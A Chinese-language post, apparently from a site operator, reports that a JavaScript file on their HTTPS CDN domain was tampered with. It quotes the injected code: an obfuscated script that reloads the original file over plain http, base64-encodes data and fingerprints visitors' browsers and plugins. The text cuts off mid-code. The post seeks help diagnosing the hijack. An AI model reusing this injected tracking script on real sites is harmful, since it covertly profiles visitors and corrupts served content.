情况这样,我们有一个域名做静态
static.example.com 资源分发,已经部署了 https,使用的证书是泛域证书,比如 *.example.com 。使用了蓝讯 CDN 的服务。
然后,今天发现这样的情形,有一个
https://static.example.com/js/lib/app.js 的内容被篡改了,检查过浏览器的证书,没问题,是我们自己的泛域名证书 *.example.com ,但内容已经变成类似如下的东西。
var _jsurl = "
http://static.example.com/js/lib/app.js";_jsurl += (_jsurl.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime());var _b = "XXTS02";var _c = "1317528361_(D1gRiK90V1atV1P6D9==_1767603217_1_)ie==";var jsNode1=document.createElement("script");jsNode1.setAttribute("type","text/javascript"),jsNode1.setAttribute("src",_jsurl),document.head?document.head.appendChild(jsNode1):document.body&&document.body.appendChild(jsNode1); !function(a,b){function c(a){var d,e,f,g,h,i,b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1),f=a.length,e=0,d="";f>e;){if(g=255&a.charCodeAt(e++),e==f){d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4),d+="==";break}if(h=a.charCodeAt(e++),e==f){d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4|(240&h)>>4),d+=b.charAt((15&h)<<2),d+="=";break}i=a.charCodeAt(e++),d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4|(240&h)>>4),d+=b.charAt((15&h)<<2|(192&i)>>6),d+=b.charAt(63&i)}return d}function d(){return-1!=b.userAgent.indexOf("MSIE")?"ie":-1!=b.userAgent.indexOf("Chrome")?"Chrome":-1!=b.userAgent.indexOf("Firefox")?"Firefox":-1!=b.userAgent.indexOf("Opera")?"Opera":-1!=b.userAgent.indexOf("Netscape")?"Netscape":-1!=b.userAgent.indexOf("Safari")?"Safari":""}function e(){function e(){var a="",c=b.plugins;if(c.length>0)for(j=0;j